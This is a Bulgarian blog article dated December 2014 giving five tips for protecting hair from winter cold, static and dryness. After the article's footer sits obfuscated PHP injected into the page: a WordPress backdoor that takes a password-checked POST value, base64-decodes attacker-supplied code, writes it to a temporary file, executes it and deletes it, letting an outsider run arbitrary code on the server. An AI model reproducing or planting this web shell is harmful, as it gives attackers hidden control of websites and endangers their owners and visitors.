5 съвета, за да предпазим косата си през зимата | Косопад

5 съвета, за да предпазим косата си през зимата

През зимния сезон косата ни страда от студа, дъжда и снега. Много често, заради промените в температурите, косата остава влажна или наелектризирана, и е невъзможно да я срешем. Затова, ви предлагаме 5 съвета, за да я поддържаме правилно:

kosa-prez-zima

1. Не я мийте всеки ден. Оставяйте поне 1 ден между две къпания или го правете всеки трети ден. Статичното електричество е резултат от увредена коса с много отворени пори, което не абсорбира влага.
2. Не изплаквайте напълно балсама или защитните масла, защото те предпазват от топлината. По време на сушата през студените месеци, вредите от въздуха са огромни. Купувайте козметика, която е подходяща за нуждите на косата ви. Гледайте шампоана, балсама и крема да са от една и съща марка.
3. Оставяйте косата ви да се суши по естествен начин, преди да я срешете или да я обработите с преса. Колкото по- малко я излагате на високи температури, толкова по- добре ще усвоява хидратацията от шампоана и балсама.

statichno-elektrichestvo
4. През този сезон се постарайте поне веднъж месечно да ходите във салон за красота за професионална хидратация. Така поддържате косата здрава и блестяща.
5. Когато е много студено и ветровито, статичното електричество завладява косата ви. Затова, преди да се появи проблема, използвайте продукти срещу него. Изсушете косата с кърпа, нанесете добре върху скалпа, срешете с гребен с дебели зъби.

Носете шапка през студените месеци, за да предпазвате косата си, но да не е много стегната. Сваляйте я при първа възможност.

16. декември 2014 15:00:14 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}